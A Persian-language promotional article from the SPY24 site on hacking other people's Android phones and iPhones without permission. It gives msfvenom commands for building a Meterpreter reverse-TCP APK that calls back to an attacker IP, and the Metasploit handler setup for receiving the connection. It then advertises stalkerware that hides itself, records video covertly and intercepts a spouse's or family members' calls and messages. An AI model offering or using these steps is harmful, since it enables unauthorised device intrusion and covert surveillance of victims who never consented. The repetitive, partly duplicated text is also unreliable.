بهترین برنامه های هک گوشی اندرویدی آیفون

هک گوشی دیگران بدون اجازه با شماره تلفن

این روزها بحث هک گوشی دیگران بدون اجازه با شماره تلفن تبدیل به یک بحث فراگیر شده که احتمالا هر روز درباره آن مطالبی را می شنوید. حتما الان سوالاتی مانند این که آیا گوشی موبایل اندرویدی یا آیفون را می شود؛ هک کرد؟ دارید. اما بهترین راه برای هک کردن گوشی چیست. از جمله بهترین روش ها برای انجام این کار مربوط به برنامه یا اپلیکیشن های خاصی می باشد. نرم افزار هک گوشی بدون اجازه رایگان وجود دارد پس شما باید همیشه مراقب هکرها باشید. در این مطلب از وبسایت اسپای 24 شما را با دانلود برنامه هک گوشی بدون اجازه برای اندروید و آیفون آشنا می کنیم. 

آیا هک گوشی دیگران بدون اجازه ممکن است؟

هک گوشی دیگران بدون اجازه ، نرم افزار هک گوشی بدون اجازه رایگان ، دانلود برنامه هک گوشی دیگران ، دانلود برنامه هک گوشی از طریق شماره تلفن ، نرم افزار کنترل گوشی همسر

آیا از این قبیل سوالات برایتان ایجاد شده است. مطمئن باشید که تنها شما نیستید که این سوالات را دارید و این روزها افراد زیادی به دنبال پاسخ این سوالات و روشی برای هک گوشی بدون اجازه رایگان آن ها هستند. همه این سوال را دارند که هک از راه دور چگونه انجام میشود تا بتوانند اعضای خانواده و عزیزان خود را کنترل کنند.

حال آیا واقعا چگونه می شود گوشی موبایل اندرویدی یا آیفون را هک کرد؟ در این نوشته بطور کامل به بحث هک گوشی و روش های آن می پردازیم و خواهیم گفت که آیا برنامه ای برای هک گوشی دیگران بدون اجازه آنها وجود دارد و در صورت وجود به معرفی آن خواهیم پرداخت.

روش های هک گوشی دیگران بدون اجازه با شماره تلفن

هک کردن گوشی بحث پیچیده ای است و به این راحتی نمی توان درباره آن صحبت کرد چرا که یک مسئله ی بسیار کلی است و اگر منظورمان را درست بگوییم یعنی این که بتوانیم تلفن همراه دیگران را بطور کامل تحت تصرف و نفوذ خود در بیاوریم. برای هک گوشی روش های بسیار زیادی وجود دارد که هکرهای حرفه ای به خوبی این روش ها را می دانند.

اگر شما هم می خواهید این روش را فرابگیرید و به هک گوشی دیگران بدون اجازه آنها بپردازید قبل از هر چیز باید زبان های برنامه نویسی هک را بلد باشید. بعد از آن به سراغ آموزش هک گوشی و کد نویسی برای هک کردن گوشی بروید. البته باید بدانید که انجام این مراحل به همین سادگی نیست و نیازمند زمان بسیار زیاد و ذهنی آزاد است.

سیستم عامل کالی لینوکس

یکی از روش هایی که می توانید با استفاده از آن اقدام به هک گوشی دیگران بدون اجازه کنید، استفاده از سیستم عامل کالی لینوکس است. برای اینکه بتوان گوشی اندرویدی را هک کرد باید نسخه کالی لینوکس را روی سیستم خود داشته باشید. پس از آن با استفاده از ترمینال محبوب لینوکس اقدام به فراخوانی برنامه msfvenom می کند. با استفاده از این ابزار، هکر اقدام به ساخت یک برنامه برای دانلود برنامه هک گوشی بدون اجازه برای اندروید به صورت APK می نماید. برای ساخت چنین ابزاری هکر تنها نیاز دارد که دستور زیر را در محیط ترمینال لینوکس وارد نماید.

<msfvenom -p android/meterpreter/reverse_tcp LHOST=(attacker-ip-address) LPORT=(port-to-receive-connection).<Name.apk<==

در دستور فوق هکر به جای عبارت LHOST می تواند از آدرس آی پی خودش و در قسمت LPORT از پورت اینترنت خودش استفاده کند. Name.apk نام ابزاری است که هکر آن را می سازد تا با آن اقدام به هک اندروید نماید.

سپس با انجام دادن راهکارهای بالا به ترتیب انجام دهید :

  • Msf>use exploit/multi/handler
  • Msf>set PAYLOAD android/meterpreter/reverse_tcp
  • Msf>set LHOST 192.168.1.35
  • Msf>set LPORT 443

البته این بار در قسمت LHOST نیاز است که آدرس سرور را وارد کند. این کار با استفاده از دستور ipconfig در محیط ترمینال انجام میشود و شما به خواسته خود رسیده اید.

حالا وقتی که هدف شما بر روی برنامه ای که هکر با عنوان Name.apk ساخته کلیک کند و آن را اجرا کند، عملیات هک اندروید از طریق لینوکس موفقیت آمیز انجام می شود. همانطور که می بینید در این روش هک نیاز چندانی به دانش برنامه نویسی نیست و تنها از طریق دنبال کردن یک سری قواعد و دستورات هر شخصی قادر خواهد بود با استفاده از یک سیستم عامل کالی لینوکس اقدام به هک اندروید نماید.

انواع برنامه هک گوشی دیگران بدون اجازه

از دیگر روش های نفوذ به گوشی دیگران بدون اجازه آن ها می توان استفاده و دانلود برنامه هک گوشی را عنوان کرد. اکثر برنامه های هک به گونه ای هستند که برای استفاده از آنها باید به گوشی فرد موردنظرتان دسترسی داشته باشید و برنامه را برروی گوشی آنها نصب کنید. اما برنامه هایی نیز هستند که با ارسال آنها برای فرد موردنظرتان و کلیک او بر روی لینک ارسالی شما نیز می توانید عمل هک با لینک را انجام دهید. همچنین برنامه هایی هم هستند که به شما امکان هک گوشی دیگران بدون اجازه با شماره تلفن آنها و از طریق شماره تلفن را می دهند. در ادامه تعدادی از این برنامه ها را معرفی خواهیم کرد.

برنامه Spy Video Recorder

این نرم افزار ابزاری برای جاسوسی و تصویربرداری مخفیانه توسط گوشی موبایل فرد قربانی می باشد. نحوه کار با این برنامه بسیار ساده می باشد. این برنامه را می توانید روی گوشی خود و یا هر فردی که می خواهید نصب کنید و در زمان هایی که نباید کسی متوجه تصویربرداری شود، این برنامه می تواند به صورت مخفیانه و حتی در صورت قفل بودن گوشی شروع به فیلمبرداری نماید.

نرم افزار جاسوسی و شنود از راه دور spy برای هک گوشی دیگران بدون اجازه

spy app یکی از نرم افزارهایی است که همه موارد ذکر شده در بالا را ارائه می دهد. این برنامه با هدف کنترل و نظارت بر اعضای خانواده طراحی و عرضه شده است. با استفاده از این برنامه می توانید به تمام پیام ها و تماس ها و همچنین کلیه فعالیت های فرزند خود در فضای مجازی نظارت داشته باشید.

علاوه بر این ها با استفاده از این نرم افزار جاسوسی و شنود برای هک گوشی دیگران بدون اجازه قادر خواهید بود تمام مکالمات اعضای خانواده خود را شنود کنید. یکی از قابلیت هایی که این برنامه را از دیگر نرم افزارهای جاسوسی متمایز می کند توانایی هک و جاسوسی از راه دور و با استفاده از شماره تلفن و اطلاعات دیگری از گوشی فرزند می باشد.

ویژگی برنامه Spy Video Recorder

این نرم افزار ابزاری برای جاسوسی و تصویربرداری مخفیانه توسط گوشی موبایل فرد قربانی می باشد. نحوه کار با این برنامه بسیار ساده می باشد. این برنامه را می توانید روی گوشی خود و یا هر فردی که می خواهید نصب کنید و در زمان هایی که نباید کسی متوجه تصویربرداری شود، برنامه هک گوشی دیگران بدون اجازه با شماره تلفن می تواند به صورت مخفیانه و حتی در صورت قفل بودن گوشی شروع به فیلمبرداری نماید. علاقه مندان به دانلود این نرم افزار جاسوسی و شنود می توانند از طریق لینک زیر برنامه spy video recorder را دانلود نمایند.

نرم افزار spy app

هک گوشی دیگران بدون اجازه با برنامه spy app با هدف کنترل و نظارت بر اعضای خانواده طراحی و عرضه شده است. با استفاده از این برنامه می توانید به تمام پیام ها و تماس ها و همچنین کلیه فعالیت های فرزند خود در فضای مجازی نظارت داشته باشید. علاوه بر این ها با استفاده از این نرم افزار جاسوسی و شنود قادر خواهید بود تمام مکالمات اعضای خانواده خود را شنود کنید. یکی از قابلیت هایی که این برنامه را از دیگر نرم افزارهای جاسوسی متمایز می کند توانایی هک و جاسوسی از راه دور و با استفاده از شماره تلفن و اطلاعات دیگری از گوشی فرزند می باشد.

برنامه spy app برای هک گوشی دیگران بدون اجازه با شماره تلفن اکنون توسط کارشناسان ایرانی به زبان فارسی ترجمه و تغییراتی درخور کاربران ایرانی در آن اعمال شده است. همچنین spy app  دارای پشتیانی به زبان فارسی و به صورت آنلاین نیز می باشد. در این مطلب از سایت اسپای 24 در مورد نرم افزار هک گوشی بدون اجازه رایگان و دانلود برنامه هک گوشی بدون اجازه برای اندروید توضیح دادیم.

منبع: www.brettwilson.co.uk

برنامه SPY24 :

که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت SPY24 بر عهده کاربر می باشد.

سامانه مراقبت از خانواده (SPY24) نام یک نرم افزار موبایل با نصب و فعال‌سازی بسیار ساده می باشد که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد.

در زیر می توانید برخی از امکانات برنامه SPY24 را مشاهده نمایید:

  • نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان
  • گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…
  • موقعیت لحظه مستمر و مسیر های پیموده شده
  • وب سایت های بازدید شده و برنامه های اجرا شده
  • با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور
  • امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور

keleis andre

برنامه ردیابی و کنترل نامحسوس گوشی موبایل و تبلت از راه دور

یک دیدگاه

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دکمه بازگشت به بالا